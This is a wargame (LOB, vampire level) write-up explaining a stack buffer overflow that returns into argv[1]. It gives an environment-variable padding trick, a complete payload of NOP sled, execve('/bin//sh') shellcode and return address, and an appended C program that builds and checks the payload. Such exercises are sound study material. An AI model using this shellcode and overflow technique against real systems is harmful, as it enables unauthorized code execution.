
LOB Redhat 6.2 - troll

5unKn0wn 2015. 10. 24. 09:21


troll - check 0xbfff : the vampire binary requires argv[1][47] == 0xbf but rejects argv[1][46] == 0xff, so a return address of the usual 0xbfff____ form is refused and the target has to sit below 0xbfff0000.

Stack : buffer[40] + sfp[4] + ret[4], with argv[1] and the environment strings above it near the top of the stack

Dummy : export dummy=`python -c 'print "A"*80000'` (an 80000-byte, about 0x13880, environment variable at the top of the stack pushes argv[1] down from the 0xbfff____ range into 0xbffe____)

return address : 0xbffec3b9 (inside the NOP sled at the start of argv[1] after the dummy is set; byte 46 is 0xfe, byte 47 is 0xbf)

Payload : ./vampire `python -c 'print "\x90"*21 + "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80" + "\xb9\xc3\xfe\xbf"'`

21 NOPs + 23-byte execve("/bin//sh") shellcode fill buffer[40] + sfp[4] (44 bytes), and the 4-byte address overwrites ret, 48 bytes in total.


Technique : return into argv[1] itself (NOP sled + shellcode), using the environment-variable dummy to move argv[1] below 0xbfff0000.
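The byte accounting above is easy to get wrong by one, so here is an added example (not from the original post) that assembles the 48-byte argv[1] payload in C and mirrors the level's two argument checks. Assumptions: the shellcode and the 0xbffec3b9 address are the ones from the post, and the checks mirrored in passes_vampire_check() are the argv[1][47] == 0xbf and argv[1][46] != 0xff tests of the vampire binary. It only builds and validates the bytes; it does not run the exploit.

```c
/* Added example: build the argv[1] payload for the LOB vampire level and
 * mirror its "check 0xbfff" argument tests. The shellcode and the return
 * address are taken from the post; the checks are assumed to be the
 * argv[1][47] == 0xbf and argv[1][46] != 0xff tests of the level. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define BUF_SIZE    40          /* char buffer[40] in the target */
#define SFP_SIZE     4          /* saved frame pointer */
#define RET_SIZE     4          /* saved return address */
#define PAYLOAD_LEN (BUF_SIZE + SFP_SIZE + RET_SIZE)   /* 48 bytes */

/* execve("/bin//sh") shellcode from the post: 23 bytes and NUL-free,
 * so strcpy() in the target copies all of it. */
static const unsigned char shellcode[] =
    "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e"
    "\x89\xe3\x52\x53\x89\xe1\xcd\x80";
#define SHELLCODE_LEN (sizeof(shellcode) - 1)

/* Fill out[] with NOP sled + shellcode + little-endian return address and
 * NUL-terminate it. Returns the payload length (48) or -1 on a size error. */
int build_payload(unsigned char *out, size_t outsz, uint32_t ret_addr)
{
    if (outsz < PAYLOAD_LEN + 1 || SHELLCODE_LEN > BUF_SIZE + SFP_SIZE)
        return -1;
    size_t nops = BUF_SIZE + SFP_SIZE - SHELLCODE_LEN;   /* 44 - 23 = 21 */
    memset(out, 0x90, nops);
    memcpy(out + nops, shellcode, SHELLCODE_LEN);
    /* x86 is little-endian: 0xbffec3b9 is stored as b9 c3 fe bf */
    for (int i = 0; i < RET_SIZE; i++)
        out[nops + SHELLCODE_LEN + i] = (ret_addr >> (8 * i)) & 0xff;
    out[PAYLOAD_LEN] = '\0';
    return PAYLOAD_LEN;
}

/* Mirror of the vampire level's argument checks (assumed to be exactly
 * these two byte tests). Returns 1 if the argument would be accepted. */
int passes_vampire_check(const unsigned char *arg, size_t len)
{
    if (len < PAYLOAD_LEN) return 0;
    if (arg[47] != 0xbf) return 0;      /* "stack is still your friend." */
    if (arg[46] == 0xff) return 0;      /* "but it's not forever" */
    return 1;
}

/* Byte idx of the payload built for ret_addr, or -1 if out of range. */
int payload_byte(uint32_t ret_addr, int idx)
{
    unsigned char p[PAYLOAD_LEN + 1];
    if (idx < 0 || idx >= PAYLOAD_LEN) return -1;
    if (build_payload(p, sizeof p, ret_addr) < 0) return -1;
    return p[idx];
}

/* Would a payload returning to ret_addr survive the level's checks? */
int ret_addr_accepted(uint32_t ret_addr)
{
    unsigned char p[PAYLOAD_LEN + 1];
    int n = build_payload(p, sizeof p, ret_addr);
    return n > 0 && passes_vampire_check(p, (size_t)n);
}

int main(void)
{
    unsigned char p[PAYLOAD_LEN + 1];
    int n = build_payload(p, sizeof p, 0xbffec3b9u);
    printf("payload length %d, argv[1][46]=0x%02x argv[1][47]=0x%02x\n",
           n, p[46], p[47]);
    printf("0xbffec3b9 accepted: %d\n", ret_addr_accepted(0xbffec3b9u));
    printf("0xbfffc3b9 accepted: %d\n", ret_addr_accepted(0xbfffc3b9u));
    return 0;
}
```

The contrast between 0xbffec3b9 and 0xbfffc3b9 is the whole point of the level: both are valid stack addresses, but only the one pushed below 0xbfff0000 by the environment dummy gets past the byte-46 test.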